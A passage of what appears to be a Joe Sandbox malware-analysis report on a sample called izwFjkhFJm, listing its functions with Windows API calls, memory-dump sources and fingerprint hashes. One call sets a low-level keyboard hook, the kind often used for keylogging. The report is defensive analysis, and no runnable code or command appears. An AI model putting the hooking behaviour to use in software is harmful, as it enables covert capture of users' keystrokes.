                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 2bc7329fb2e01716b04045598d6d9db96fcdd0d60a0387cc36cc359f956235b9
                                                                                  • Instruction ID: dead6f59ae42842ed84f744963e40b28d5b523c42092872da4697960ba0a0d36
                                                                                  • Opcode Fuzzy Hash: 2bc7329fb2e01716b04045598d6d9db96fcdd0d60a0387cc36cc359f956235b9
                                                                                  • Instruction Fuzzy Hash: F621E6B9D00219AFDB10CF9AD984ADEBFF9EB48324F14841AE814A7350C774A945CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 06FC2040 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06FC18F0,00000000,00000000), ref: 06FC20C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.581540887.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_6fc0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: HookWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2559412058-0
                                                                                  • Opcode ID: 0ee17463b995f5aec89ccfd368e1585a2a03f82f346094e6197f08b23354aa03
                                                                                  • Instruction ID: 2ecb1d2cf61effb67a8c2eaaf8d81668b1cadb4966304cde909d77d14d5403f2
                                                                                  • Opcode Fuzzy Hash: 0ee17463b995f5aec89ccfd368e1585a2a03f82f346094e6197f08b23354aa03
                                                                                  • Instruction Fuzzy Hash: D72134B5D002099FCB50CF99C944BEEBBF5EF88320F14841AE459A7650CB75A945CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073E1F74 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DeleteFileW.KERNELBASE(00000000), ref: 073E3A28
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: 8233036e728ade9a9881e464928c0a0b331149e59b4d2925dfcf14554e960ed3
                                                                                  • Instruction ID: 608131a78fe6abad380d781fc0ad7f3ef8d261102147c205a36c1cb7ae12824e
                                                                                  • Opcode Fuzzy Hash: 8233036e728ade9a9881e464928c0a0b331149e59b4d2925dfcf14554e960ed3
                                                                                  • Instruction Fuzzy Hash: 172147B5C0066A9FCB10CF9AC4447AEFBB5EB48320F148129E818B7280D778A945CFE1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 06FCBB91 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,06FCBB71,00000800), ref: 06FCBC02
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.581540887.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_6fc0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 35d7a0775616ae70c26303fa8d39643b27f9874c070de9c50da92913150749a1
                                                                                  • Instruction ID: 06e875e11a5c0f0e23cddc964abf4fbe87b12fd6a8de16bda148c634f8dd03a3
                                                                                  • Opcode Fuzzy Hash: 35d7a0775616ae70c26303fa8d39643b27f9874c070de9c50da92913150749a1
                                                                                  • Instruction Fuzzy Hash: 9B1126BAD002499FCB10CF9AD985ADFFBF9EB48324F14842EE415A7600C779A545CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 06FCA588 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,06FCBB71,00000800), ref: 06FCBC02
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.581540887.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_6fc0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: acb16fc708932753357f88b706843cdbf2a36abea2d7ce63676bc53e7e074f0a
                                                                                  • Instruction ID: 89afed243d8767e6ac486f1041b14d98abf7ac961fad1ed5c92dd8eb49ffa4c7
                                                                                  • Opcode Fuzzy Hash: acb16fc708932753357f88b706843cdbf2a36abea2d7ce63676bc53e7e074f0a
                                                                                  • Instruction Fuzzy Hash: 581117BAD002099FDB10CF9AC984ADEFBF5EB48324F10841EE415A7200C775A945CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073EC233 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,073E9235), ref: 073EC2A7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 4dedceffa200f8aef7e345edcf765267e8fd99d5c8a0c367b18ea9c6f41399a9
                                                                                  • Instruction ID: 714512fad790e076d3a029acd66f0c1a7776efc54ac8e3bf4c56392873af8d1b
                                                                                  • Opcode Fuzzy Hash: 4dedceffa200f8aef7e345edcf765267e8fd99d5c8a0c367b18ea9c6f41399a9
                                                                                  • Instruction Fuzzy Hash: 541148B5D002598FCB10CF9AD844BDEFFF8EB48324F24845AD418A7240C778A985CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073E1F68 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 073E43A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 13335b67ac5218925a5e98d96dc86ba7173614f420539a3c07d5cda6dd010398
                                                                                  • Instruction ID: 6721750db34ac94e9a98897784ffbdb559f3a675b1bb80d117478685bdd2caaf
                                                                                  • Opcode Fuzzy Hash: 13335b67ac5218925a5e98d96dc86ba7173614f420539a3c07d5cda6dd010398
                                                                                  • Instruction Fuzzy Hash: 071102B5D003599FDB20CF9AD844BDEFBF9EB88224F10841AE819B7640D375A945CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073E4339 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 073E43A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: f0c0c98d47ad455ce5a646b3fb0583f4976453f232f4f6f2918303f34a1c08fc
                                                                                  • Instruction ID: 1b6345f314ac9403aee9b5f50b8b0aed9343b30e0e5f0ce44fd943ed67967d58
                                                                                  • Opcode Fuzzy Hash: f0c0c98d47ad455ce5a646b3fb0583f4976453f232f4f6f2918303f34a1c08fc
                                                                                  • Instruction Fuzzy Hash: CB1113BAC002598FDB20CF9AC544BDEFBF9AF48224F15841AD419B7640D379A946CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073E7B1C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OleInitialize.OLE32(00000000), ref: 073ECC35
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Initialize
                                                                                  • String ID:
                                                                                  • API String ID: 2538663250-0
                                                                                  • Opcode ID: 0c157c483cabe9f044a09e27782f2decc97f335acb7230b472cc760060f017d4
                                                                                  • Instruction ID: 6d086cd846b08f562fd89668dc4b476b14e8d5176810c3b7ac0de7e40c59f48d
                                                                                  • Opcode Fuzzy Hash: 0c157c483cabe9f044a09e27782f2decc97f335acb7230b472cc760060f017d4
                                                                                  • Instruction Fuzzy Hash: 401148B58003599FDB10CF9ED584BDEBBF8EB48324F108459D459B7240C374A985CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073E7934 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,073E9235), ref: 073EC2A7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: ccc317f42a26db1e3644c58c5ea046a6448df77dae8eb79711f975a92d0e022a
                                                                                  • Instruction ID: 495d02982c116a926e53d1e37bff6d29cf41ac3e885cfcea845e9865a2a92102
                                                                                  • Opcode Fuzzy Hash: ccc317f42a26db1e3644c58c5ea046a6448df77dae8eb79711f975a92d0e022a
                                                                                  • Instruction Fuzzy Hash: 451115B59002199FDB20DF9AD884BDEFBF8EB48324F20845AD419A7240C775A944CFE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073ECBD9 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OleInitialize.OLE32(00000000), ref: 073ECC35
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Initialize
                                                                                  • String ID:
                                                                                  • API String ID: 2538663250-0
                                                                                  • Opcode ID: 1c548e93aa93c560f06e750fc75b82e22757144d358f48a13558470ee8105098
                                                                                  • Instruction ID: 06201862a1e7f647bec9ee8ea136a3f2b3669f371c408bbc34960511c780e8db
                                                                                  • Opcode Fuzzy Hash: 1c548e93aa93c560f06e750fc75b82e22757144d358f48a13558470ee8105098
                                                                                  • Instruction Fuzzy Hash: 671145B98002088FCB20CF9AD584BCEBFF9AB48324F208419D419A7600C379A985CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 016DD3EC Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.525308947.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_16dd000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d11c6106e703ee822c903e8e3d33d5b318ec0d88f9a4b5a2eb6366015c291533
                                                                                  • Instruction ID: b8de63e120ea2aaebdf7f96bcbc02f9e5279a9fd0a8897cdf6f0a3ae3a1fecf2
                                                                                  • Opcode Fuzzy Hash: d11c6106e703ee822c903e8e3d33d5b318ec0d88f9a4b5a2eb6366015c291533
                                                                                  • Instruction Fuzzy Hash: 05210675901244EFDB05EF98DDC0B67BF65FB94324F24C56DD8090B286C336E456C6A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 016DD4D8 Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.525308947.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_16dd000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e09db56e3639b84a31e796be8a34d94227fb274963ced496ec42910682748f8e
                                                                                  • Instruction ID: 5fd5ce86a8f18dc23b579eeab20d751e022bbd59eb9546f971544cfb8f2acaac
                                                                                  • Opcode Fuzzy Hash: e09db56e3639b84a31e796be8a34d94227fb274963ced496ec42910682748f8e
                                                                                  • Instruction Fuzzy Hash: 80210675900244DFDB15EF58DDC0B16BF65FB88328F648569D8050B296C336D856CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 016ED006 Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.525582391.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_16ed000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 28ef92da2b7274b077e9427bcad9284d4a2703a15ec8efce8e7e9d321c033c59
                                                                                  • Instruction ID: bf86ae68b37677f057f32a681fd7359567027bd8a6ef5885057bacbd57ea824b
                                                                                  • Opcode Fuzzy Hash: 28ef92da2b7274b077e9427bcad9284d4a2703a15ec8efce8e7e9d321c033c59
                                                                                  • Instruction Fuzzy Hash: 6A217E711093C09FCB038F24D994711BFB1AB46214F29C6DBD8848F2A7C33A984ACB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 016ED030 Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.525582391.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_16ed000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c4525c61f2811af82baae828790b2408ec08d41720d81445373b8bed74670218
                                                                                  • Instruction ID: aaba53ab0aac4c1822f959a3c7b505ab121b9c128aae78271e42c1389b5cfc0d
                                                                                  • Opcode Fuzzy Hash: c4525c61f2811af82baae828790b2408ec08d41720d81445373b8bed74670218
                                                                                  • Instruction Fuzzy Hash: F6210075604244DFDB11CF58DDC8B26BFA5EB84354F28C66ED80A4B386C33AD847CA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 016ED118 Relevance: .1, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.525582391.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_16ed000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dae73817ede9626f50acdaa024a760c131a2a8a19883f78a63a761635117a35a
                                                                                  • Instruction ID: 654c601b18de11a8dd669e523b70b132e9be9f84d99f0c336a9965125c52f0c2
                                                                                  • Opcode Fuzzy Hash: dae73817ede9626f50acdaa024a760c131a2a8a19883f78a63a761635117a35a
                                                                                  • Instruction Fuzzy Hash: B1213475604240DFDB05CF58CDC8B56BFA6FB84319F24C66DD8094B346C33AD846CA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 016DD3E7 Relevance: .1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.525308947.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_16dd000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                  • Instruction ID: 645dfc02ff7e813f9715af8bbbe5c16231b0103dca24219efe97cd9f48e93bf7
                                                                                  • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                  • Instruction Fuzzy Hash: DD11D276805240CFCB02DF44D9C0B56BF61FB84324F24C6A9D8480B656C33AD45ACBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 016DD4D3 Relevance: .1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.525308947.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_16dd000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                  • Instruction ID: 5cd5d7534c7225875addb4667ee7f67a193eb5e442e38f1df2f1b404309fb034
                                                                                  • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                  • Instruction Fuzzy Hash: 6411B176904280DFDB12DF54D9C4B16BF71FB84324F2886A9D8450B756C33AD456CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 016ED113 Relevance: .1, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.525582391.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_16ed000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3ea0fc80cb549e230918ecc6a47501d7840b27f092f69901688e36f6bbcdc59c
                                                                                  • Instruction ID: ba8305a1a0e49d5b2323dadd9bdeaa99c968264199e4c188a8cd2f7bcabb4e8a
                                                                                  • Opcode Fuzzy Hash: 3ea0fc80cb549e230918ecc6a47501d7840b27f092f69901688e36f6bbcdc59c
                                                                                  • Instruction Fuzzy Hash: 9B118B75504280CFDB06CF18DAC4B55BFA2FB84218F28C6ADD8494B796C33AD84ACB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 016DD819 Relevance: .0, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.525308947.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_16dd000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 93f961438c756a2a8f2528e7c3b35db89c7d3873985526e209f12d91cd87c7a7
                                                                                  • Instruction ID: 25115703373f32610515de0718b5fe7e29d1d53785baafd236de109400788d92
                                                                                  • Opcode Fuzzy Hash: 93f961438c756a2a8f2528e7c3b35db89c7d3873985526e209f12d91cd87c7a7
                                                                                  • Instruction Fuzzy Hash: 4E01F771D04344AAE722AA6ECC85767BF98DF45364F18841AED0D1B2C6C3799844C6B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 016DD818 Relevance: .0, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.525308947.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_16dd000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dfe3550232a7a47a6877a5a52fd1a9f61a0f85b96b3a8fa09a4f9287ee5439b7
                                                                                  • Instruction ID: 6bc3a4cb1a2314c2e812957a5d495f90fcbf3d0f9f0771faa60aa535f64381eb
                                                                                  • Opcode Fuzzy Hash: dfe3550232a7a47a6877a5a52fd1a9f61a0f85b96b3a8fa09a4f9287ee5439b7
                                                                                  • Instruction Fuzzy Hash: C9F0C271904344BEE7228A5ADC84B62FF98EF41374F18C45AED081B386C3799844CAB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%